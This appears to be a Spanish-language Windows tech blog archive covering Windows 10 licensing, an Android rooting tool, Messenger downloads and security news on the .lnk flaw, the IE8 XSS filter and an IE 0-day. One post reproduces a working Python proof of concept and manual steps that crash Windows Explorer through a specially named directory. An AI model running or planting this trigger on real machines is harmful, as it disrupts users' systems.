Windows 10 será gratuito? Para quienes si y para quién no? una explicación breve

Windows 10 tiene planeada su fecha de lanzamiento para el 29 de Julio del  2015 y los usuarios de las versiones actuales de los sistemas operativos de Windows obtendrán una versión gratuita como actualización. Esto es lo que Microsoft ha notificado en diversas ocasiones desde Enero donde fue presentado el nuevo sistema operativo incluyendo Cortana, Project Spartan (nuevo Microsoft Edge), DirectX 12 y Hololens que al parecer corren bajo Windows 10.

¿Dónde está la confusión?

Desde ese anuncio, Micorsoft ha enviado señales mixtas (más de una) y los especuladores han acaparado los temas de cómo obtener una copia gratuita y quienes no lo podrán hacer, si los usuarios Insiders (beta testers) obtendrán un serial o no. A continuación veremos una lista de las diferentes vías para actualizar a Windows 10.

Windows 10 para Insiders.

Para los usuarios beta testers de Windows 10, Microsoft pone a su alcance una vía de actualización gratuita a la versión final RTM (Release to Manufacturing) por medio de actualizaciones, sin tener que iniciar una instalación desde cero de ésta nueva versión del Sistema Operativo.

Microsoft ha confirmado que las versiones originales de Windows 7 y 8 son candidatas para recibir la nueva actualización a Windows 10 genuina.

Si el usuario no cuenta con una versión genuina para actualizar, puede adquirir (comprar) la nueva versión. Para los usuarios beta testers podrán actualizar a Windows 10 RTM, pero las actualizaciones tendrán una caducidad sin embargo, pueden seguir actualizando y extendiendo el tiempo de la licencia indefinidamente.

Windows 10 para piratas.

Los usuarios que actualmente cuentan con versiones piratas de Windows 7 y 8 podrán actualizar el sistema operativo a Windows 10, sin embargo seguirán siendo piratas después del proceso de actualización, con las desventajas que eso conlleva.

Windows 10 para usuarios de Windows XP y Vista.

Windows XP fué liberado hace 13 años y ya no tiene soporte, no habrá mecanismo para actualizar esas versiones a Windows 10 directamente desde Windows Vista y XP; sin embargo, podrán instalar una copia limpia de Windows 10 desde cero. No habrá soporte gratuito para éstas versiones.

Windows 10 para usuarios de Windows 7, Windows 8 y 8.1

Windows 10 se ofrece como actualización gratuita para las versiones Windows 7 y Windows 8.1 para el primer año, una vez que el dispositivo se ha actualizado a Windows 10 éste será soportado durante el todo el tiempo de vida del dispositivo.

Usuarios de Windows 7 Starter, Home Basic, Premium and Windows 8.1 serán actualizados a Windows 10 Home.

Usuarios de Windows 7 Professional, Ultimate and Windows 8.1 Pro podrán actualizar a la versión Windows 10 Pro.

Las versiones Windows Phone 8.1 podrán actualizar a Windows 10 Mobile.

Windows Enterprise, Windows RT and Windows 8 no tendrán derecho para la actualización gratuita.

La intención de Microsoft es clara, acaparar la mayor parte de dispositivos más modernos con ésta nueva versión de Windows 10, si su dispositivo corre Windows 7 con buen rendimiento es un buen candidato para actualizar a Windows 10, pero si éste no tiene el rendimiento adecuado, la recomendación es ignorar ésta nueva actualización.

¿Qué pasa después del primer año?

Microsoft bajo Satya Nadella cambia rápidamente, y la tendencia es Windows as a Service. La compañía ya ha optado por cambiar en vez de grandes cambios de versiones (releases) a actualizaciones incrementales y pequeñas continuamente para todo el sistema operativo. Ellos dejan claro que ésta es tal vez, la última versión de Windows.

“Right now we’re releasing Windows 10, and because Windows 10 is the last version of Windows, we’re all still working on Windows 10,” said Jerry Nixon, a Microsoft Developer Evangelist.

Los usuarios de Windows 7 y 8.1 que decidan actualizar a Windows 10 seguirán tendiendo su copia genuina indefinidamente. Aunque cabe destacar que la oferta tendrá caducidad y después de ése tiempo tendrán que pagar por Windows 10.

Microsoft anunció los precios de Windows 10, y éstos serán los mismos que las últimas versiones 8.1 del sistema operativo, es decir, la versión Windows 10 estándar costará lo mismo que la versión Windows 8.1 $119 USD, y la versión Windows 10 Pro costará igual que la versión Windows 8.1 Pro $199 USD, el paquete Windows 10 Pro pack que permite actualizar de la versión Windows Home a la versión Windows 10 Pro costará $99 USD.

Windows as a Service.

Con el mercado cambiante de dispositivos como Xbox, PC's, tablets, phones, Hololens microsoft tiene una dura competencia y la tendencia es marcada por Google, Apple, Amazon, Facebook. Microsoft no se puede quedar atrás y se arriesga en el Mercado de SO como servicio un rompimiento al esquema que Microsoft ha sostenido por casi 3 décadas.

De momento no se puede predecir cuánto tiempo durará ésta tendencia, pero lo que viene para Windows 10 será la venta de aplicaciones por medio de Windows Store, una combinación de Windows 10 + Office 365, campañas de ventas por Bing, sofware en la nube, etc.

Hacer dinero de la gran cantidad de usuarios activos de Windows es un gran reto, pero el primer paso para la compañía es invitar a todos sus usuarios a adoptar la nueva plataforma Windows 10, la compañía lo entendió con el mercado mobile, no habrá dinero si nadie usa tu producto.

Fuente.

http://www.techspot.com/article/1002-windows-10-free-or-not-explained/

Obtener la versión Windows 10 Insider.

http://windows.microsoft.com/es-mx/windows/preview-faq

Alfonso Cruz

Unlock Root Android 2.1, 2.2, 2.3

Rootear Android es un proceso muy sencillo, con Unlock Root tenemos la posibilidad de instalar aplicaciones que requieren permisos de root (superusuario) y desde la aplicación podemos decidir, en qué momento conceder o denegar los permisos de root a cada app que instalemos en Android.

Además en compatible con los siguientes modelos:

• HTC Sensation 
• Galaxy Nexus (i9250) 
• LG Optimus 3D (P920) 
• HTC Wildfire S 
• Galaxy Note (I9220) 
• LG Optimus 2x 
• HTC Desire S 
• Galaxy S II (I9100) 
• LG Optimus LET 
• HTC Incredible S 
• Galaxy S (I9000) 
• LG Optimus Black 
• LG Optimus PRO (c660h)

Entre otros.

Como se puede apreciar en la imagen de la aplicación, basta con Activar el modo de depuración USB (desde Ajustes/Aplicaciones/Desarrollo/Depuración USB) y conectarlo por medio de un cable USB a la computadora.

 Finalmente, al dar clic en el botón Root de Unlock Root comenzará el proceso de rooteo el cual finalizará después de algunos instantes y se reiniciará el celular con un nuevo icono de superuser en el menú de aplicaciones.

Se recomienda que antes de comenzar el proceso se aseguren de que el equipo cuente con la carga suficiente, y deben haber instalado los drivers de su equipo celular.

Enlace de descarga de Unlock Root

Compatible con: XP, Vista y Windows 7.

Windows Explorer Denial Of Service (DOS)

# Windows 2008 SP2 RC2 Explorer Go Byebye :P
# Windows 7 Pro SP1 Explorer Go Byebye :P
# Interesting
# Brought to you by Level & z0r0 @ Smash The Stack

from win32com.shell import shell, shellcon
from os import mkdir

try:
mkdir("c:\\trigger_alt")
except:
print "[!] Trigger Directory Exists"
try:
mkdir("c:\\trigger_alt\\....")
except:
print "[!] Trigger Sub Directory Exists"

print "[!] Triggering Issue"

# This moves the directory containing the sub directory which creates the condition.
# The issue is in the function that moves the files to the recycle bin
# Replicate this using the following
# 1- mkdir c:\trigger_alt
# 2- cd c:\trigger_alt
# 3- mkdir ....\
# 4- My Computer -> c:\trigger_alt
# 5- Right Click -> Delete

shell.SHFileOperation((0,shellcon.FO_DELETE,'c:\\trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION))

Windows Live Messenger 2011 15.4.3508.1109

Windows Live Messenger 2011 rompe por primera vez con el diseño clásico de Messenger hasta la fecha: una ventana con contactos con los que más tarde puedes interactuar.

En lugar de ello, la ventana de Windows Live Messenger 2011 se expande para aunar en un mismo espacio las actividades de tus contactos en redes sociales como Facebook o MySpace, así como tus contactos propiamente dichos. Nunca antes podías tener tan "controlados" a tus amigos.

No sorprende por tanto que el aspecto de Windows Live Messenger 2011, con pestañas incluidas, sea una de las principales novedades: incluso los emoticonos han sufrido un lavado de cara, con nuevos fichajes incluidos. Sin embargo, los cambios de Windows Live Messenger 2011 no terminan ahí.

Con Windows Live Messenger 2011, compartir datos con tus contactos es cosa de niños. Las fotografías (desde tu equipo, webs o álbumes online) se muestran en una agradable vista compartida. Además, no sólo podrás enviar clips de voz: ahora también puedes mandar clips de vídeo.

En definitiva, Windows Live Messenger 2011 es, por fin, una versión completamente nueva tanto en el aspecto como en el concepto, a la que sólo queda reprochar su incompatibilidad con Windows XP.

Descargar

Ojo: La version 2011 no soporta windows xp.

Windows Live Messenger 2011 15.4.3002.810 Beta

La mensajería y las redes sociales se unen en un unico programa


Windows Live Messenger 2011 rompe por primera vez con el diseño clásico de Messenger hasta la fecha: una ventana con contactos con los que más tarde puedes interactuar.

En lugar de ello, la ventana de Windows Live Messenger 2011 se expande para aunar en un mismo espacio las actividades de tus contactos en redes sociales como Facebook o MySpace, así como tus contactos propiamente dichos. Nunca antes podías tener tan "controlados" a tus amigos.

No sorprende por tanto que el aspecto de Windows Live Messenger 2011, con pestañas incluidas, sea una de las principales novedades: incluso los emoticonos han sufrido un lavado de cara, con nuevos fichajes incluidos. Sin embargo, los cambios de Windows Live Messenger 2011 no terminan ahí.

Con Windows Live Messenger 2011, compartir datos con tus contactos es cosa de niños. Las fotografías (desde tu equipo, webs o álbumes online) se muestran en una agradable vista compartida. Además, no sólo podrás enviar clips de voz: ahora también puedes mandar clips de vídeo.

En definitiva, Windows Live Messenger 2011 es, por fin, una versión completamente nueva tanto en el aspecto como en el concepto, a la que sólo queda reprochar su incompatibilidad con Windows XP.
Cambios recientes en Windows Live Messenger:

* Pequeños cambios en la interfaz
* Corrección de errores
* Más rápido y consume menos recursos
* Chat con amigos de Facebook (no disponible en todos los países todavía)

Para utilizar Windows Live Messenger necesitas:

* Sistema operativo: WinVista/7

No compatible con win xp
descargar aqui

Microsoft publica actualización fuera de ciclo para vulnerabilidad en los .lnk

Hoy no es el segundo martes del mes pero Microsoft acaba de publicar el boletín de seguridad MS10-046 de carácter crítico, en el que se soluciona la ya conocida vulnerabilidad relacionada con archivos LNK (accesos directos).

La publicación con carácter de urgencia se debe a que como ya habíamos anunciado se habían facilitado todos los detalles de la vulnerabilidad y además está siendo aprovechada de forma activa.

El problema afecta a Windows XP, Vista, Windows 7, Windows Server 2008 y Windows Server 2008 R2. Tal y como reconoce Microsoft, en la actualidad hay múltiples familias de malware que se aprovechan de esta vulnerabilidad y esta actualización protege contra cualquier intento de explotación.

Dada la gravedad de las vulnerabilidades se recomienda la actualización de los sistemas con la mayor brevedad posible, mediante Windows Update o descargando los parches, según versión, desde las direcciones facilitadas en el propio boletín de seguridad:

Descarga el parche de seguridad (crítico):

http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx

El filtro XSS de Internet Explorer 8 sigue siendo vulnerable

Los investigadores Eduardo Vela y David Lindsay han presentado, en el marco de la conferencia Black Hat Europa de este año, un nuevo método para ejecutar ataques de cross-site scripting a través de los filtros XSS de Internet Explorer 8.

Microsoft introdujo un mecanismo para filtrar ataques de cross-site scripting, concretamente los de "tipo 1" o no persistentes. Un cross-site scripting no persistente es la clase de ataque más común y extendida de este tipo de ataques.

El atacante manipula una URL insertando código malicioso que, de manera errónea, aprovechando una vulnerabilidad, el sitio web usará para generar una página que contendrá el código legítimo más el código introducido por el atacante.

La víctima que "inadvertidamente" use la URL proporcionada por el atacante, enviará una petición hacia el servidor web y este "reflejará" el código de vuelta hacia el cliente donde es usado por el navegador como si fuese código legítimo.

Es denominado no persistente ya que el servidor no almacena el código malicioso y es reflejado porqué en realidad es el mismo navegador el que va a enviar el ataque a través de la petición HTTP hacia el servidor web y éste de vuelta al navegador de la víctima.

La idea general del filtro XSS de Internet Explorer, es observar la secuencia solicitud-respuesta entre navegador y sitio web. A grandes rasgos, modifica el código que se recibe del servidor antes de que sea interpretado por el navegador, si detecta que la página recibida contiene código sospechoso enviado en una de las solicitudes del navegador. Básicamente, evita "reflejar" el código malicioso.

La base del mecanismo de neutralización de ataques del filtro es alterar el código malicioso. En caso de observar código sospechoso de vuelta al navegador, el filtro actúa antes de que se interprete la página, insertando o reemplazando caracteres en partes de ese código para impedir su ejecución transformándolo en código no válido.

Ya en su momento se hizo público una vulnerabilidad que aprovechaba el filtro XSS para producir este tipo de ataques. Microsoft liberó un boletín (MS10-002) en el que se corregía la vulnerabilidad. Aun así, se encontraron nuevas formas para revertir el uso del filtro y Microsoft volvió a reforzarlo en un nuevo boletín (MS10-018).

Lo que han mostrado los investigadores es que es no solo es posible evadir el filtro sino que sigue siendo posible efectuar ataques de cross-site scripting, incluso en sitios webs que no son vulnerables. Adicionalmente, el filtro también podría ser usado por el atacante para impedir la ejecución de scripts legítimos, posibilitando la evasión de mecanismos de seguridad propios del sitio web visitado.

David Ross de Microsoft, ha confirmado que publicarán un parche hacia el mes de junio para prevenir este tipo de ataque.

Más Información:

Abusing IE8s XSS Filters [PDF]
http://p42.us/ie8xss/Abusing_IE8s_XSS_Filters.pdf

Guidance on Internet Explorer XSS Filter
http://blogs.technet.com/msrc/archive/2010/04/19/guidance-on-internet-explorer-xss-filter.aspx

Nuevo 0-day en Microsoft Internet Explorer

Microsoft informa de una vulnerabilidad en el navegador Internet Explorer que podría permitir a un atacante remoto ejecutar código arbitrario, con los permisos del usuario, a través de un sitio web especialmente manipulado.

La vulnerabilidad, a la que se le ha asignado el CVE-2010-0806, se encuentra en "iepeers.dll" y está causada por un puntero inválido al que se podría acceder, bajo ciertas condiciones, tras liberar el objeto apuntado.

Microsoft ha detectado y confirma que la vulnerabilidad está siendo explotada activamente. Se consideran vulnerables las versiones 6 y 7.

Se recomienda seguir las indicaciones de Microsoft a fin de minimizar el impacto. Microsoft está trabajando para publicar un parche que solucione esta vulnerabilidad.

Más Información:

Microsoft Security Advisory (981374)

http://www.microsoft.com/technet/security/advisory/981374.mspx

Security Advisory 981374 Released (blog MSRC)

http://blogs.technet.com/msrc/archive/2010/03/09/security-advisory-981374-released.aspx

Descubren un fallo en Windows con una década de antigüedad

Se ha encontrado una vulnerabilidad crítica en Windows que compromete todas las versiones del sistema operativo de Microsoft desde 2000.

La empresa 2X Software afirma haber encontrado una vulnerabilidad en el sistema operativo de Microsoft que podría utilizarse para realizar ataques de denegación de servicio en las ediciones de Windows de la última década.

Se trata, en opinión de la compañía, de un gran problema que pone en riesgo a decenas de millones de ordenadores de todo el mundo. “Este tipo de vulnerabilidad deja a los usuarios abiertos a ataques de denegación de servicio que pueden ser devastadores”, afirman desde 2X Software.

Según la compañía, Windows 2000, Windows XP (y XP Embedded), Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2 son vulnerables. Desde Microsoft han anunciado que están comprobando la información.

FUENTE: Itexpresso

Aplicaciones gratuitas compatibles con windows 7

La mayoría de las aplicaciones comerciales actuales pueden funcionar bajo Windows 7. Pero el hallar programas gratuitos que funcionen con el último sistema operativo de Microsoft es algo más difícil. Hay, sin embargo, herramientas -desde simples aplicaciones de sincronización hasta interfaces completas- que trabajan bien con Windows 7.

Por ejemplo, si la subscripción a su antivirus está a punto de cancelar, usted se preguntará si hay soluciones gratuitas que sirvan para Windows 7.

Sí las hay. En efecto, tras el reciente lanzamiento de Security Essentials de Microsoft para usuarios de Windows, los fabricantes de antivirus de pago están tratando de diferenciar sus ofertas de modo que valga la pena pagar por ellas.

Pero hay también buenas alternativas gratuitas a Security Essentials. Avira existe para Windows 7 antes de la aparición de Security Essentials. Lo mismo puede decirse de Avast Free Edition. Otras buenas opciones de anti-malware y anti-spyware son Malwarebytes, Ad-Aware y SAS.

También os recomendamos dos excelentes programas para chequear nuestro sistema y eliminar todas aquellas aplicaciones “espías”: Spyware Doctor y SpyBot Search & Destroy

Un lector nos confía: me gustan las nuevas herramientas de backup en Windows 7, pero no veo forma de sincronizar archivos fácilmente entre dos computadoras. ¿Hay algún buen freeware que lo haga?

SyncToy es una herramienta de Microsoft que cumple muy bien esta tarea. Es una lástima que esta pequeña aplicación no esté incluida en Windows 7. No obstante, SyncToy ha sido diseñada más bien para uso simple que para quienes prefieren muchas opciones de sincronización, de modo que, si usted quiere una herramienta más robusta, elija otra.

Una opción podría ser 2 Bright Sparks, que posee muchas opciones de sincronización, incluyendo la posibilidad de sincronizar a través de una red o de un servidor FTP (File Transfer Protocol). Puede usted incluso sincronizar a un archivo comprimido (ZIP) para ahorrar espacio.

Hay usuarios que echan de menos en Windows 7 herramientas como las PowerToys que Microsoft entregaba con el sistema XP. ¿Hay herramientas que sirvan para Windows 7?

Es una lástima, en efecto, que Microsoft haya cesado el desarrollo de PowerToys. Pero hay herramientas similares para Windows 7 de otros fabricantes.

Hay programas como XdN Tweaker que facilitan la búsqueda de los ajustes (”tweaks”) disponibles en la interfaz de Windows 7 y disponen de algunos trucos útiles. Otras herramientas como Ultimate Windows Tweaker, se centran en ajustes más difíciles a Windows 7, para los cuales hay que hacer uso del Registro del Sistema. Aunque el más popular de todos es TuneUp Utilities que nos permitirá mejorar el rendimiento, aumentar el espacio en el disco, ordenar el registro, detectar y reparar problemas o personalizar los aspectos visuales de tu sistema.

Para grabar

Si no le gusta la forma en que Vista o Windows 7 graban CDs o DVDs, andará usted en busca de programas gratuitos que trabajen como los viejos programas Nero o Roxio y que sean compatibles con Windows 7.

Pues bien, hay un par de buenas opciones. CD Burner XP tiene las letras “XP” en su nombre, pero trabaja también muy bien con Windows 7, y a usted le agradará su forma simple de grabar discos, sin aditivos que hinchen innecesariamente el programa.

Otra opción es BurnAware Free, cuya interfaz permite elegir la grabación de datos, música, videos o crear un disco de arranque.

Mejorar el look

¿Hay alguna aplicación que haga la interfaz de Windows 7 más similar a la del Mac?

ObjectDock es un programa gratuito que le hará sentir que su Windows 7 se parece a un Mac, gracias a su carpeta de objetos animados, en la cual puede organizar accesos directos, programas y aplicaciones.

Con ObjectDock puede despedirse del menú Inicio, si quiere. Puede determinar también cómo presentar sus tareas actuales, sea sólo como íconos, con versiones minimizadas del contenido de las aplicaciones, o ambas cosas.

Hay también un recurso llamado “mini applets” que permite colocar aplicaciones en miniatura en el escritorio, tal como los “widgets” que Microsoft introdujo con Vista. Entre otras cosas, los applets de ObjectDock pueden mostrar la hora, el estado del tiempo o una búsqueda en la Web. Las animaciones en ObjectDock son suaves y la aplicación ocupa pocos recursos del sistema.

Mencionemos también CircleDock, una aplicación gratuita que, tal como su nombre lo indica, pone todos los accesos directos, los archivos y las carpetas en un arreglo circular en el escritorio, supuestamente para facilitar su acceso. Es totalmente compatible con Windows 7.

Os recomendamos una visita a nuestra sección de descargas… seguro que os llevaís más de una sorpresa con software gratuito que os permitirá ahorrar dinero y sin necesidad de piratear software legal, que recordamos es una actividad ilicita.

Via Noticiasdot

Incompatibles Windows 7 y iPhone

Se avisará a los usuarios para una pronta actualización y no tener problemas NUEVA YOYK, EU.- La gran popularidad de iPhone ha llegado hasta a los PCs, tanto que su uso es mayoritario para pasar datos desde el PC al teléfono con iTunes.

Por ahora parece haber problemas con Windows 7, aunque se ha visto en algunos casos y no en la mayoría de ordenadores con este SO.

Muchos usuarios están optando por comprar un ordenador de sobremesa o un portátil con este nuevo sistema operativo y muchos de ellos disponen de un terminal iPhone.

Al parecer el problema entre Windows 7 y iPhone proviene del chipset de Intel P55 Express USB, el cual nos lleva a un error ( 0xE8000065 ), siempre que el usuario intente sincronizar casi cualquier archivo.

Desde EngadgetMobile aconsejan utilizar un PCI interno USB que no sea del fabricante californiano, cosa que arreglará el problema en cuestión de apenas unos minutos. Intel ya está intentado solucionar este fallo y problema que les tiene trabajando desde hace unas semanas y que posiblemente llegue en los próximos días.

Se avisará a los usuarios para una pronta actualización del mismo y no tener problemas de transferir datos desde Windows 7 a iPhone.

Via Informador

Linux contra Windows 7

Free Software Foundation lanza el sitio “Windows7Sins.org” y acusa a Microsoft de invadir la privacidad de los usuarios

La FSF, una asociación que defiende los derechos de los internautas en la red, considera que la nueva versión del sistema operativo de Windows que lanzará Microsoft este octubre “ejecuta” aplicaciones a espaldas de los propietarios del equipo.

windows7sinsEntre los pecados que acomete Windows, según la FSF, se encuentran la vinculación a los formatos propietarios de Microsoft, la baja seguridad de los productos de la multinacional, la integración de sistemas de protección de derechos de autor (DRM) que violan la privacidad de los usuarios.

“Ya hace algún tiempo que Windows se convirtió en una plataforma para gerenciar derechos de autor restringiendo las copias que los usuarios decidan realizar”, dijo la FSF en un comunicado.

La organización defiende que con esta actuación, Microsoft “controla al completo el uso de los ordenadores” perjudicando la libre elección de los propietarios de las maquinas.

Además del site que permitirá concienciar a los usuarios sobre las limitaciones de Windows 7, la FSF enviará una carta a los principales ejecutivos de las empresas del ranking “Fortune 500″ en la que pondrá de manifiesto las ventajas que representa para las compañías el uso de software libre en lugar de sistemas operativos propietarios

Via Noticiasdot.com

Microsoft mejora la "autoejecución" de Windows 7. ¿Gracias, Conficker?

Microsoft ha decidido mejorar la seguridad de la funcionalidad de "autoejecución" de los medios extraíbles en los que se pueda escribir. Lo hará en Windows 7 y anteriores (a través de actualización se supone). Un nuevo paso en la dirección correcta, pero como siempre, demasiado tarde. ¿Nadie aprende de las lecciones pasadas? Ha tenido que ocurrir un desastre como el Conficker para que Microsoft reaccione. No es la primera vez que un golpe vírico acelera el proceso de fortificación de Windows.

Por fin. A pesar de que no era muy complicado adivinar que la popularidad de las memorias USB en combinación con la autoejecución de Windows traería problemas, esta venía activada por defecto. Los creadores de malware se han venido aprovechando de esta circunstancia desde hace varios años. El uso cada vez mayor de memorias USB no ha hecho más que agravar la situación, transportándonos a tiempos pasados, en los que el disquete era el medio de propagación natural para los virus.

Ahora Windows 7 mejora esta funcionalidad, evitando el diálogo de ejecución automática en memorias USB. Esto no es una desactivación total. Para los dispositivos que en los que se supone no se puede escribir (medios ópticos), seguirá preguntando qué hacer y entre esas opciones permitirá la ejecución automática. Los atacantes encontrarán una forma de aprovechar esto (por ejemplo a través de memorias USB que montan automáticamente una unidad óptica virtual...), pero al menos se da un paso en la dirección correcta.

¿Por qué ahora?

La respuesta corta es Conficker. A pesar de que se sigue diciendo en los medios que el método preferido de este gusano es aprovechar una vulnerabilidad en el servicio RPC de Windows parcheada a finales de 2008, no es del todo cierto. Conficker ha aprovechado como nadie el autorun.inf de Windows, poniendo en jaque a Microsoft y a las casas antivirus. Encontró la forma de ofuscar el contenido de manera que pasara desapercibido para los motores antivirus. También consiguió saltarse la protección del autorun propia de Microsoft, por lo que tuvieron que corregir el fallo a través de un parche porque la medida no se mostraba demasiado efectiva. Conficker además consiguió engañar a muchos usuarios modificando el diálogo de autoplay que muestra el autorun: parecía que ibas a explorar la carpeta cuando en realidad ejecutabas el archivo... ingeniería social bastante sofisticada. Esto es, principalmente, lo que se ha buscado evitar con el cambio introducido en Windows 7.

Aunque el autorun está siendo aprovechado por una buena cantidad de malware desde hace años, desde finales de 2008 Conficker ha conseguido, como ningún otro, encontrar todos los puntos débiles de la funcionalidad y explotarlos con éxito.

También ha influido el hecho de que en los reportes de Microsoft se han materializado, en los últimos meses, escalofriantes cifras sobre malware que a su vez ha aprendido de Conficker y ha potenciado este vector de ataque.

La misma piedra, la misma reacción

A finales de 2001, cuando apareció el sistema operativo XP, Microsoft introdujo de serie una estupenda funcionalidad que cada vez se mostraba más necesaria en aquellos momentos: un cortafuegos. Lo traía deshabilitado por defecto. Es cierto que hubiese resultado un cambio demasiado drástico teniendo en cuenta que se venía de un "sistema operativo" como Windows 98.

Con el Service Pack 2 en verano de 2004, Windows activó el cortafuegos por defecto. Entonces, los culpables fueron en buena parte otros gusanos: Blaster y Sasser. El verano anterior (2003) causaron una terrible epidemia. Blaster fue "culpable" de muchas otras mejoras de seguridad, pero la más clara fue la activación del cortafuegos, que hubiera evitado buena parte del problema que el propio Blaster causó. Y la medida fue efectiva. De un plumazo desaparecieron la mayoría de los gusanos de propagación masiva que accedían a los servicios que escuchaban en los puertos de Windows. La respuesta de los creadores de malware fue el uso de conexiones inversas (que van desde el sistema infectado hacia servidores nodriza) eludiendo así la protección de un cortafuegos entrante. Windows Vista incluye un cortafuegos para las conexiones salientes que podría mitigar un poco el problema pero una vez más, viene desactivado por defecto.

Es una pena que Microsoft no se anticipe a estas catástrofes (en ocasiones previsibles), y suela reaccionar con posterioridad, a base de golpes, cuando el daño ya está hecho. La parte positiva, es que poco a poco, las malas costumbres heredadas de sus "sistemas operativos" excesivamente permisivos y de una Internet mucho menos agresiva, se van corrigiendo.


AutoRun changes in Windows 7
http://blogs.technet.com/srd/archive/2009/04/28/autorun-changes-in-windows-7.aspx

Via Hispasec